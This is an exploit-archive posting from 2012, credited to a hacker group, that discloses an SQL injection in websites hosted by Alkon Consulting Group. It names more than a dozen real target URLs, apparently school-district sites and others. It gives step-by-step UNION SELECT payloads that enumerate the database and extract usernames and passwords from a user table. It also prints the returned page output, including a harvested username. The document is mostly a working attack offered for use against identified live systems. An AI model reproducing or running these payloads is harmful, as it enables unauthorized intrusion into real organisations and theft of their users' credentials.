Home / exploitsPDF  

Alkon Consulting Group SQL Injection

Posted on 24 January 2012

|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| |* ______ ____ __ __ | |* /\__ _/ _` / / | |* /_/ / L \ \_ { Turki$ hackers } | |* _ <' _ | |* L \ | |* \_ \____/ \_ \_ | |* /_/ /___/ /_//_/ | |* | |* Skote_vahshat and bl4ck.viper | |=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=| ========================================================================= * [Title] :[Alkon Consulting Groupsql injection vulnerability]/* * [Author] :[skote_vahshat] /* * [Home] :[Http://turk-bh.ir] /* * [Email] :[skote.vahshat@Gmail.Com] /* ========================================================================== /* /* /* /* Website Hosting provided by Alkon Consulting Group /* /* /* DB Server: MySQL /* version PHP : 5.2.6 /* Web Server : apache ,unix ,mod_ssl2.2 ,php ,.... /* /* =================================================================== /* [+]Exploit : /* http://www.target.com/page.php[SQLi] /* /* [+] (target ) /* [.] (Demo ) /* [+]http://bibich.lcsc.us/page.php?id=44[SQLi] /* [+]http://grimmer.lcsc.us/page.php?id=44 [SQLi] /* [+]http://www.lcsc.us/page.php?id=44 [SQLi] /* [+]http://kahler.lcsc.us/page.php?id=44 [SQLi] /* [+]http://lakecentralef.org/page.php?id=58 [SQLi] /* [+]http://homan.lcsc.us/page.php?id=44 [SQLi] /* [+]http://peifer.lcsc.us/page.php?id=44 [SQLi] /* [+]http://westlake.lcsc.us/page.php?id=11 [SQLi] /* [+]http://www.edmunds.com/page.php?id=11 [SQLi] /* [+]http://transport.lcsc.us/page.php?id=11 [SQLi] /* [+]http://watson.lcsc.us/page.php?id=136 [SQLi] /* [+]http://clark.lcsc.us/page.php?id=44 [SQLi] /* [+]http://help.lcsc.us/page.php?id=99 [SQLi] /* [+]http://kahler.lcsc.us/page.php?id=47 [SQLi] /* [+]http://lake-central.lcsc.us/page.php?id=17 [SQLi] /* [+] /* [+]inject: /* union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 =>> column 2 and 3 /* union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13 =>> version 5.0.92-community /* union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13 =>> lcscus_lchs /* /* [+] (table) =>> user /* /* union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+user /* /* /* [+] column /* union+select+1,uname,pw,4,5,6,7,8,9,10,11,12,13+from+user /* /* =>>> Query and answers <<<= /* /* union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+user /* columna 2 and 3 /* <td width="960" valign="middle" id="boxheader"><strong>2/strong></td> /* <td valign="top" id="padding1">3</td> /* /* union+select+1,uname,pw,4,5,6,7,8,9,10,11,12,13+from+user /* /* <td width="960" valign="middle" id="boxheader"><strong>username/strong></td> /* <td valign="top" id="padding1">password</td> /*--------------------------- <td width="960" valign="middle" id="boxheader"><strong>tiwema</strong></td> </tr> <tr> <td valign="top" height="300" id="subboxes"><table width="100%" border="0" cellpadding="0" cellspacing="0"> <!--DWLayoutTable--> <tr> <td width="335" valign="top" align="center"><br /><img src="img/school-logo-png-256x283.png" width="256" height="283" /><br /></td> <td width="625" valign="top"> <table cellpadding="0" cellspacing="0" border="0" width="100%"> <tr> <td valign="top" id="padding1">3</td> </tr> =================================================================================== |_***_|thanks: bl4ck.viper , dr.tofan , hellboy , netqurd , turk_server kingcope | |_***_| spical thnaks :all tbh member ,iraniyan hacker all turkiS hackers | ===================================================================================